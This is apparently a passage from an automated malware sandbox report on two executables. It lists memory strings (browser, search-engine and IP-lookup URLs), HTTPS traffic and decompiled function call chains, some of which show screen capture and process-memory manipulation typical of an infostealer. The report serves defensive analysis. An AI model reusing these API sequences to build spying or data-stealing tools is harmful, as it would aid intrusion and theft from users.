                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099870231.00000218BE215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000005.00000002.1978076132.0000000004FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: 3UuxTH6FMX.exe, 00000008.00000002.2193147052.00000218BFD60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: 3UuxTH6FMX.exe, 00000008.00000002.2193147052.00000218BFD60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/3)
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2120404079.00000218BE281000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120597539.00000218C0058000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2120404079.00000218BE281000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120597539.00000218C0058000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099870231.00000218BE215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099870231.00000218BE215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099870231.00000218BE215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2120404079.00000218BE281000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120597539.00000218C0058000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2120404079.00000218BE281000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120597539.00000218C0058000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: powershell.exe, 00000005.00000002.1981163512.0000000006008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.1981163512.0000000006008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.1981163512.0000000006008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2099057290.00000218BFDFF000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2099057290.00000218BFDFF000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2099057290.00000218BFDFF000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powershell.exe, 00000005.00000002.1978076132.00000000050F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: powershell.exe, 00000005.00000002.1981163512.0000000006008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2112207449.00000218C05D0000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2116619540.00000218C121D000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEEA000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115513211.00000218C06EC000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2112207449.00000218C05D8000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2113394324.00000218C0698000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115513211.00000218C06E4000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115062683.00000218BFE17000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2112207449.00000218C0690000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115513211.00000218C076B000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEE2000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115960288.00000218C0763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2100300244.00000218BFDE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2100300244.00000218BFDE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2120404079.00000218BE281000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120597539.00000218C0058000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099870231.00000218BE215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2120404079.00000218BE281000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120597539.00000218C0058000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099870231.00000218BE215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2112207449.00000218C05D0000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2116619540.00000218C121D000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEEA000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115513211.00000218C06EC000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2112207449.00000218C05D8000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2113394324.00000218C0698000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115513211.00000218C06E4000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115062683.00000218BFE17000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2112207449.00000218C0690000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115513211.00000218C076B000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEE2000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115960288.00000218C0763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2113394324.00000218C069F000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2117054631.00000218C13E5000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115960288.00000218C0773000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115513211.00000218C06F4000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2112207449.00000218C05DF000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2113394324.00000218C069F000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2117054631.00000218C13E5000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115960288.00000218C0773000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115513211.00000218C06F4000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2112207449.00000218C05DF000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53977
                Source: unknownNetwork traffic detected: HTTP traffic on port 53977 -> 443
                Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:53977 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBCFB30 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SHCreateMemStream,SelectObject,DeleteDC,ReleaseDC,DeleteObject,EnterCriticalSection,LeaveCriticalSection,IStream_Size,IStream_Reset,IStream_Read,SelectObject,DeleteDC,ReleaseDC,DeleteObject,8_2_00000218BFBCFB30
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD3CF0 GetModuleHandleA,GetProcAddress,OpenProcess,NtQuerySystemInformation,NtQuerySystemInformation,GetCurrentProcess,NtQueryObject,GetFinalPathNameByHandleA,CloseHandle,CloseHandle,8_2_00000218BFBD3CF0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC226E0 NtAllocateVirtualMemory,8_2_00000218BFC226E0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD43F0 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize,8_2_00000218BFBD43F0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA1015F0 NtQueryVirtualMemory,NtProtectVirtualMemory,8_2_00007FF7AA1015F0
                Source: C:\Users\user\Desktop\9RM52QaURq.exeCode function: 0_2_0118D3240_2_0118D324
                Source: C:\Users\user\Desktop\9RM52QaURq.exeCode function: 0_2_04AEE6E80_2_04AEE6E8
                Source: C:\Users\user\Desktop\9RM52QaURq.exeCode function: 0_2_04AEB9F10_2_04AEB9F1
                Source: C:\Users\user\Desktop\9RM52QaURq.exeCode function: 0_2_04AE00230_2_04AE0023
                Source: C:\Users\user\Desktop\9RM52QaURq.exeCode function: 0_2_04AE00400_2_04AE0040
                Source: C:\Users\user\Desktop\9RM52QaURq.exeCode function: 0_2_073505E80_2_073505E8
                Source: C:\Users\user\Desktop\9RM52QaURq.exeCode function: 0_2_073554B00_2_073554B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A5B7705_2_04A5B770
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A5B7485_2_04A5B748
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB8ACC08_2_00000218BFB8ACC0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBCFB308_2_00000218BFBCFB30
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD8B708_2_00000218BFBD8B70
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC0E9688_2_00000218BFC0E968
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB8C8C08_2_00000218BFB8C8C0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB7F8B08_2_00000218BFB7F8B0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC098C08_2_00000218BFC098C0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB8B8208_2_00000218BFB8B820
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD08208_2_00000218BFBD0820
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD662B8_2_00000218BFBD662B
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD16608_2_00000218BFBD1660
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBDC55A8_2_00000218BFBDC55A
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBE749C8_2_00000218BFBE749C
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBB13408_2_00000218BFBB1340
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB922D08_2_00000218BFB922D0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB7F1C08_2_00000218BFB7F1C0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBCF2008_2_00000218BFBCF200
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBF114C8_2_00000218BFBF114C
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD70B08_2_00000218BFBD70B0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD1FF08_2_00000218BFBD1FF0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB8CF608_2_00000218BFB8CF60
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBC8F608_2_00000218BFBC8F60
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBF9EA08_2_00000218BFBF9EA0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB7FEE08_2_00000218BFB7FEE0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBCAE508_2_00000218BFBCAE50
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBBFDB08_2_00000218BFBBFDB0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB55DB08_2_00000218BFB55DB0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBE0D988_2_00000218BFBE0D98
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBEEE068_2_00000218BFBEEE06
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB56D208_2_00000218BFB56D20
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBF4D788_2_00000218BFBF4D78
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBE2CD08_2_00000218BFBE2CD0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBBCC508_2_00000218BFBBCC50
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBE8C348_2_00000218BFBE8C34
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB87B8D8_2_00000218BFB87B8D
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBF19B88_2_00000218BFBF19B8
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBA9A108_2_00000218BFBA9A10
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBE4A008_2_00000218BFBE4A00
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBF29F48_2_00000218BFBF29F4
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBB89508_2_00000218BFBB8950
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBBC9308_2_00000218BFBBC930
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBF69848_2_00000218BFBF6984
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBE58D08_2_00000218BFBE58D0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBC28C08_2_00000218BFBC28C0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB9C8208_2_00000218BFB9C820
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBE088C8_2_00000218BFBE088C
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBE47FC8_2_00000218BFBE47FC
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBEF7F48_2_00000218BFBEF7F4
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD47408_2_00000218BFBD4740
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBC67608_2_00000218BFBC6760
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB986D08_2_00000218BFB986D0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBA66A08_2_00000218BFBA66A0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBC06A68_2_00000218BFBC06A6
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBB47108_2_00000218BFBB4710
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBEE6F88_2_00000218BFBEE6F8
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBDB68A8_2_00000218BFBDB68A
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBA55B08_2_00000218BFBA55B0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB566108_2_00000218BFB56610
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBBC6008_2_00000218BFBBC600
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBE45F88_2_00000218BFBE45F8
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB755208_2_00000218BFB75520
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB765108_2_00000218BFB76510
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD05008_2_00000218BFBD0500
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBF54E88_2_00000218BFBF54E8
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBFA4388_2_00000218BFBFA438
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB783D08_2_00000218BFB783D0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBF13C88_2_00000218BFBF13C8
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD43F08_2_00000218BFBD43F0
